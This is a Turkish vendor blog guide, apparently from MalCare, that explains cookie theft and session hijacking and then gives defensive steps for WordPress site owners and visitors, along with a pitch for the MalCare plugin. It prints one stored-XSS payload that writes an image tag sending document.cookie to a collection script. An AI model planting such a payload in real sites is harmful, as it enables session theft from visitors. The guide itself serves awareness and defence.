Çerez Çalma ve Ele Geçirme Oturumları Nasıl Engellenir? (En Kolay Kılavuz)

Web sitenizin gizli verileri saklamak için çerez kullandığını biliyor muydunuz? Bilgisayar korsanlarının çerezlerinizi kolayca çalabileceğini biliyor muydunuz? Bu, web sitenizi ve ziyaretçilerinizi riske atabilir!

Çerezler, bir müşterinin reklam tercihlerinden oturum açma kimlik bilgilerine ve kredi kartı bilgilerine kadar her türlü bilgiyi saklar. Çerezler internette yaygın olarak kullanılmaktadır ve ne sıklıkta çalındıkları korkutucudur.

Çerez çalmanın veya oturum kaçırmanın kurbanıysanız, bunun sonuçları ciddi olabilir. Yalnızca gelirinizi ve ziyaretçilerinizin güvenini kaybetmekle kalmaz, aynı zamanda yasal sorunlar ve ağır para cezalarıyla da karşılaşabilirsiniz!

Ancak endişelenmeyin çünkü bugün, bu saldırıları önlemek için bilmeniz gereken her şeyi size anlatacağız!

Bu kılavuzda, önce bilgisayar korsanlarının çerezleri nasıl çaldığını öğreneceğiz, ardından önleyici tedbirleri inceleyeceğiz.

TL;DR : WordPress web siteniz için endişeleniyor musunuz? Bir Oturum Ele Geçirme ve Çerez Çalma Koruması Eklentisi yükleyerek sitenizi hemen şimdi güvenceye alabilirsiniz. Web sitenizi düzenli olarak tarar ve bir bilgisayar korsanının çerezleri çalmasına olanak tanıyan herhangi bir kötü amaçlı kod enjekte etmesi durumunda sizi uyarır. Eklentiyi kullanarak, saldırıyı anında temizleyebilir ve sonuçlarından kaçınabilirsiniz.

İçerik tablosu

→ Çerez Çalma Nedir?

→ Bilgisayar Korsanları Çerezleri Çalmak ve Oturumları Ele Geçirmek İçin Siteler Arası Komut Dosyasını (XSS) Nasıl Kullanıyor?

→ Çerez Çalma ve Oturum Kaçırma Nasıl Engellenir?

→ Web Sitesi Ziyaretçilerinin Çerez Hırsızlığına Karşı Alabilecekleri Adımlar

Çerez çalmak nedir?

Ne kadar istesek de, kurabiye çalmak bir çocuğun elini kurabiye kavanozuna sokması kadar basit değil! Bu karmaşık bir süreç ve neler olduğunu anlamak için temellere değinmemiz gerekiyor.

→ Çerez Nedir?

Çerezleri küçük veri parçaları olarak düşünebilirsiniz. Bir web sitesiyle etkileşiminiz hakkında bilgi depolar. Örneğin, bir e-ticaret sitesi bir müşterinin yolculuğunu – aranan ürünler, satın alınan ürünler, sepette bırakılan ürünler veya ziyaret ettikleri sayfalar – izlemek ister.

Bu, mağazaya müşterilerin neyi tercih ettiği, en çok hangi sayfaların ziyaret edildiği, kullanıcıların bir sayfada ne kadar süre kaldığı vb. konularda analitik bilgiler verir. Daha sonra bu bilgileri web sitesinde gösterilenleri müşterinin tercihlerine göre uyarlamak için kullanabilirler.

Tanımlama bilgileri, web sitesi sahiplerine neyin işe yarayıp neyin yaramadığına dair fikir verir. Bu, sitelerinde neyi değiştirmeleri veya iyileştirmeleri gerektiğini belirlemelerine yardımcı olur.

Çerezler, kullanıcılara ilgili reklamları göstermek için de kullanılır. Web sitelerini ziyaret ettiğinizde, reklamların görüntülendiğini fark edeceksiniz.

Bu reklamlar genellikle son arama geçmişinizi yansıtır. Örneğin, Google'da 'dizüstü bilgisayarlar' için arama yaptıysanız, tüm web sitelerindeki reklamların size dell reklamları gösterdiğini fark edeceksiniz. Bu reklamlar web sitesinin bir parçası değildir, ancak Google Adsense gibi hizmetler tarafından işlenir.

Çerezler, hem web sitesi sahibi hem de kullanıcı için kolaylık sağlar. Etkileşimi artırabilir ve daha fazla satışa yol açabilir, bu da web sitesi sahipleri için harikadır. Alıcıya gelince, tanımlama bilgileri, bir web sitesinde daha kişiselleştirilmiş bir deneyim yaşamalarına veya daha alakalı reklamlar görmelerine yardımcı olur.

Ancak biraz sonra tartışacağımız birçok dezavantaj var.

[Başa Dön ↑ ]

→ Tarayıcı Oturumu ve Oturum Kimliği Nedir?

Bir web sitesine giriş yaptığınızda, bilgisayarınız ile bu web sitesi arasında bir oturum oluşturulur.

Örneğin Facebook'a giriş yaptığınızda bir oturum başlar. Bu, 'oturumdan çık' seçeneğini tıklayana ve oturumu sonlandırana kadar (web tarayıcıyı kapatıp yeniden açsanız bile) Facebook'u kullanmaya devam etmenizi sağlar.

Oturum oluşturulmamışsa, her yeni veri istediğinizde oturum açmaya devam etmeniz gerekir . Örneğin, Facebook haber akışınızdan çıkmak ve bir arkadaşınızın profil sayfasını görüntülemek isterseniz, Facebook oturumunuz kapatılır ve oturum açıp arkadaşınızın profilini görüntülemek için kimlik bilgilerinizi tekrar girmeniz gerekir.

Bu nedenle seanslara ihtiyaç vardır. Farklı web sayfalarında gezinmeye ve web sitesinde gezinmeye devam edebilmeniz için oturumunuzu açık tutar.

Burada dikkat edilmesi gereken önemli nokta, her oturumun bir dizi tanımlama bilgisi oluşturmasıdır. Bunlara oturum çerezleri diyebiliriz. Ve her oturum çerezinin benzersiz bir oturum kimliği vardır.

Bir web sitesi, kullanıcının kimliğini doğrulamak ve güvenilir bir bağlantı kurmak için bu kimliği kullanır.

Örneğin, Facebook'a giriş yapmak için kullanıcı adınızı ve şifrenizi girmeniz gerekir. Ardından, benzersiz bir kimlikle bir oturum oluşturulur. Facebook web sitesine yaptığınız tüm isteklerin kimliği bu kimlikle doğrulanacaktır. Yani, farklı bir sayfayı görüntülemek istediğinizde, o sayfayı görüntülemek için Facebook sunucusuna bir istek göndermiş olursunuz. Facebook, kimliği doğrular ve görmek istediğiniz içeriği görüntüler.

Artık bilgisayar korsanları oturumunuzu ele geçirebilir ve bu güvenilir bağlantıyı kötüye kullanabilir. Sizin adınıza kötü niyetli istekler gönderebilirler. Nasıl olduğunu görelim.

[Başa Dön ↑ ]

→ Çerezlerle İlgili Güvenlik Endişeleri Nelerdir?

Çerezler oluşturulduğunda, yalnızca siz, yani site sahibi tarafından görüntülenebilir. Başka hiçbir web sitesi çerezlerinizi görüntüleyemez. Onlar sadece sana ait.

Ancak bu tanımlama bilgileri internette dolaşmaktadır. Reklam hizmetleri ve analitik hizmetleri tarafından kullanılırlar. Böylece bu tanımlama bilgileri, tüm dünyada sunucudan sunucuya sıçrar. Bağlantı güvenli değilse, bir bilgisayar korsanı bu tanımlama bilgilerini kolayca ele geçirebilir ve çalabilir.

Şimdi, bir bilgisayar korsanının alışveriş tercihlerinizle ilgili bilgileri ele geçirmeyi başarması büyük bir şey diye düşünebilirsiniz, değil mi?

Sorun, tanımlama bilgilerinin yalnızca alışveriş tercihlerinizle ilgili bilgilerden daha fazlasını saklamasıdır. Ayrıca, banka bilgilerini ve teslimat adresiniz ve iletişim bilgileriniz gibi kişisel bilgileri de saklar .

Bu tür bilgiler yanlış ellere geçerse dolandırıcılık faaliyetleri için kötüye kullanılabilir.

Bilgisayar korsanlarının çerezleri çalmasının en yaygın yollarından biri, sizinle aynı kablosuz ağı kullanıyor olmalarıdır. Bu tür wifi korsanlığı, ortadaki adam saldırıları olarak adlandırılır ve yalnızca her ikisi de aynı kablosuz ağa bağlıysa gerçekleşebilir. Bu nedenle, güvenli olmayan veya birçok kişi tarafından kullanılan halka açık kablosuz ağları asla kullanmamanız önerilir. Bu, aynı bilgisayar ağlarındaki kullanıcıların başına da gelebilir.

Diğer birkaç yöntem arasında paket koklama ve siteler arası komut dosyası oluşturma adı verilen bir güvenlik açığından yararlanma yer alır. Bugün size XSS tanımlama bilgisi çalmanın nasıl çalıştığını ayrıntılı olarak göstereceğiz.

[Başa Dön ↑ ]

Bilgisayar Korsanları Çerezleri Çalmak ve Oturumları Ele Geçirmek İçin Siteler Arası Komut Dosyasını (XSS) Nasıl Kullanıyor?

Bilgisayar korsanlarının siteler arası komut dosyası çalıştırma (XSS) saldırılarını kullanarak çerezleri nasıl çaldığını size göstermek için bir örnek kullanacağız. İçinde yorumlar bölümü olan bir web sitesini ziyaret ettiğinizi varsayalım.

Yaptığınız herhangi bir yorum web sitesinin veritabanına gönderilecektir. İdeal olarak, bu yorumlar bölümü yalnızca düz İngilizce metinleri kabul edecek şekilde yapılandırılmalıdır. Ancak özel karakterleri de kabul ederse, bu onu XSS'ye karşı savunmasız hale getirir.

Bir bilgisayar korsanı, veritabanına gönderilecek olan kendi kötü amaçlı kodlarını girebilir. İçeri girdikten sonra, kod yürütülür. Bilgisayar korsanlarının, yeni bir web sitesi yöneticisi oluşturmak veya çerezleri çalmak gibi her türlü kötü amaçlı etkinliği yürütmek için web sitesine ekleyebilecekleri çok sayıda kod vardır.

Çerezleri çalmak için bir bilgisayar korsanı aşağıdaki kodu girebilir:

Not: Bu, tanımlama bilgilerinin nasıl çalınacağına ilişkin bir eğitim değildir. Bu makale, web sitesi sahiplerini bilgisayar korsanlarının çerezleri nasıl çalabilecekleri konusunda bilinçlendirmeyi amaçlamaktadır. Herhangi bir yasa dışı faaliyette bulunmanızı tavsiye etmiyoruz.

[php]

document.write('<img src=& amp;amp;amp;quot;http://localhost/submitcookie.php?cookie ='

+ escape(document.cookie) + '" />);

[/php]

Yorumlar kısmında bu kod resim olarak çıkacaktır. (Ziyaretçi olarak) üzerine tıklarsanız, görüntülenen bir resim göreceksiniz. Ama olandan daha fazlası var.

Resme tıkladığınızda, bu PHP dosyası sessizce kodu yürütür ve oturum tanımlama bilginizi ve oturum kimliğini alır.

Artık bilgisayar korsanı, oturumunuzu yeniden oluşturabilir ve o web sitesinde sizin gibi görünebilir. Çok sayıda kötü niyetli eylem gerçekleştirebilirler. Örneğin çereziniz kredi kartı veya herhangi bir ödeme bilginizi içeriyorsa alışveriş yapabilirler.

Neyse ki, web sitesi sahiplerini ve ziyaretçilerini bu saldırılardan korumak için önleyici tedbirler var.

[ss_click_to_tweet tweet=”Web sitelerinin yorumlar bölümünde ve e-postalarda bulunan şüpheli bağlantılara asla tıklamayın. Çerez hırsızlığının kurbanı olabilirsiniz.” content=”Web sitelerinin yorumlar bölümünde ve e-postalarda bulunan şüpheli bağlantılara asla tıklamayın. Çerez hırsızlığının kurbanı olabilirsiniz.” stil=”varsayılan”]

[Başa Dön ↑ ]

Çerez Çalma ve Oturum Kaçırma Nasıl Engellenir?

Çerez hırsızlığını ve oturum kaçırmayı önlemede rol oynayan iki taraf vardır – web sitesi sahibi ve ziyaretçi. Her iki taraf için önleyici tedbirleri tartışacağız.

→ Web Sitesi Sahiplerinin Çerez Hırsızlığına Karşı Alabilecekleri Önlemler

Bir web sitesi sahibi olarak, her şeyi sizin için halledecek bir güvenlik analistiniz yoksa, aşağıdaki önleyici tedbirleri uygulamanız gerekir:

1. Bir SSL Sertifikası Kurun

Veriler, kullanıcının tarayıcısı ile web sunucunuz arasında sürekli olarak aktarılır. SSL olmadan bu veriler (çerezler) düz metin olarak gönderilir. Bir bilgisayar korsanı bu verileri ele geçirirse, kolayca okuyabilir. Bu nedenle, oturum açma kimlik bilgilerini içeriyorsa, açığa çıkacaktır.

SSL (Güvenli Yuva Katmanı), verileri aktarılmadan önce şifreler. Yani bir bilgisayar korsanı onu çalmayı başarsa bile verileri okuyamaz.

Web barındırma şirketiniz veya bir SSL sağlayıcısı aracılığıyla bir SSL sertifikası alabilirsiniz. Ayrıca Let's Encrypt'ten temel bir ücretsiz SSL sertifikası alabilirsiniz.

2. Bir Güvenlik Eklentisi Kurun

Web sitenizde MalCare gibi bir WordPress güvenlik eklentisini aktif tutun. Eklentinin güvenlik duvarı, web sitenizdeki saldırı girişimlerini önleyecek ve kötü amaçlı IP adreslerini engelleyecektir. Ayrıca, sitenizi düzenli olarak tarar ve bir bilgisayar korsanı tarafından herhangi bir kötü amaçlı kod girilmişse sizi uyarır. Web sitenizi anında temizleyebilirsiniz. Bu, herhangi bir zarara yol açmadan hemen önce bu tür saldırı girişimlerini tespit etmenize ve silmenize yardımcı olacaktır.

3. Web Sitenizi Güncelleyin

Web sitenizi her zaman güncel tutun, buna WordPress kurulumu, temaları ve eklentileri dahildir. Güncelliğini yitirmiş bir yazılımda çalıştırmak, web sitenizde bilgisayar korsanlarının yararlanabileceği birçok savunmasız nokta açar. Yeni bir güncelleme mevcut olduğunda sitenizi güncellediğinizden emin olun.

Bu güncellemeler yalnızca yeni özellikler ve hata düzeltmeleri getirmekle kalmıyor, aynı zamanda zaman zaman güvenlik açıklarını da düzeltiyor.

4. Web Sitenizi Sertleştirin

WordPress.org, web sitenizde uygulamanız gereken belirli web sitesi sağlamlaştırma önlemleri önerir. Bu, güçlü ve benzersiz kullanıcı adları ve güçlü parolalar kullanmayı, bilinmeyen klasörlerde PHP yürütmesini engellemeyi, temalarda ve eklentilerde dosya düzenleyiciyi devre dışı bırakmayı ve daha fazlasını içerir. Şimdi, bunların hepsi size jargon gibi gelebilir, bu nedenle takip edebileceğiniz, adım adım derinlemesine bir WordPress Sertleştirme kılavuzu oluşturduk.

[Başa Dön ↑ ]

Web Sitesi Ziyaretçilerinin Çerez Hırsızlığına Karşı Alabilecekleri Adımlar

Bir web sitesi ziyaretçisi olarak, web sitelerinin uygun güvenlik önlemleri aldığına körü körüne güvenmek zorunda değilsiniz. Aşağıdaki web güvenlik protokolleri ile kendinizi koruyabilirsiniz.

1. Etkili Bir Anti-Virüs Kurun

İnternete erişmek için kullandığınız cihazda kötü amaçlı yazılımdan koruma yazılımının yüklü olduğundan emin olun. Bu, kötü amaçlı bir web sitesini ziyaret ettiğinizde kötü amaçlı yazılım algılanırsa sizi uyarır. Ayrıca, yanlışlıkla indirebileceğiniz veya sisteminize yükleyebileceğiniz tüm kötü amaçlı yazılımları da kaldıracaktır.

2. Asla Şüpheli Bağlantılara Tıklamayın

Bilgisayar korsanları, web sitelerindeki yorumlar bölümü ve e-postalar aracılığıyla kullanıcıları hedefler. Özellikle cazip teklifler veya indirimlerle sizi cezbeden güvenilir olmayan bağlantılara tıklamaktan kaçının.

3. Hassas Verileri Depolamaktan Kaçının

Kredi kartı bilgilerinin alışveriş web sitelerinde saklanması, ödeme işlemini daha hızlı ve daha kolay hale getirir. Web sitelerine otomatik olarak giriş yapmak için şifreleri Google Chrome gibi web tarayıcılarına kaydetmek, şifreleri hatırlama ihtiyacını ortadan kaldırır!

Ancak hepsi yüksek bir çalınma riski taşır. Hassas verileri asla web sitelerinde saklamamak en iyisidir. Size birkaç saniye kazandırabilir ama aynı zamanda sizi saldırıya uğrama riskine de sokar.

4. Çerezleri Temizle

Google Chrome gibi tarayıcılarda saklanan hassas bilgilerden kurtulmak için çerezlerinizi düzenli olarak temizleyebilirsiniz. Erişim Geçmişi > Tarama Geçmişini Temizle. Burada 'Çerezler ve diğer site verileri' onay kutusunu işaretleyin.

'Tüm Zamanlar' veya tercihinize göre bir zaman aralığı seçin. Ardından, 'Verileri temizle'yi tıklayın, çerezler tarayıcınızın geçmişinden silinecektir.

Bu bizi çerez hırsızlığına son veriyor. Umarız bu makale, tam olarak ne olduğunu ve nasıl önleneceğini daha iyi anlamanıza yardımcı olmuştur.

[ss_click_to_tweet tweet=”MalCare'in bu kılavuzu, tanımlama bilgilerinin çalınmasını ve buna karşı önleyici tedbirlerin nasıl alınacağını anlamama yardımcı oldu. Buna bir bak." content=”MalCare'in bu kılavuzu, çerez çalmayı ve buna karşı nasıl önleyici tedbirler alacağımı anlamama yardımcı oldu. Buna bir bak." stil=”varsayılan”]

[Başa Dön ↑ ]

Son düşünceler

Bir web sitesi sahibi olarak, hem kendi çıkarlarınızı hem de ziyaretçilerinizi, müşterilerinizi ve müşterilerinizi korumak için koruyucu önlemler almanız gerekir. Ancak bir web sitesi kurmanın ve onu yönetmenin zor bir iş olduğunu anlıyoruz.

İlgilenilmesi gereken sonsuz sayıda şey vardır, bu nedenle WordPress güvenliği birçok kez arka planda kalma eğilimindedir.

Ancak web sitenizin güvenlik yönünü göz ardı etmek, diğer tüm çabalarınız için felaket olabilir.

Kolay, hızlı ve verimli bir çözüm, MalCare güvenlik eklentisidir. Bunu işe aldığınız bir güvenlik görevlisi gibi düşünebilirsiniz. Web sitenizi düzenli olarak taramak ve saldırılara karşı korumak için günün her saati çalışır. Web sitenizin emin ellerde olduğundan emin olabilirsiniz.

MalCare ile WordPress sitenizi koruyun !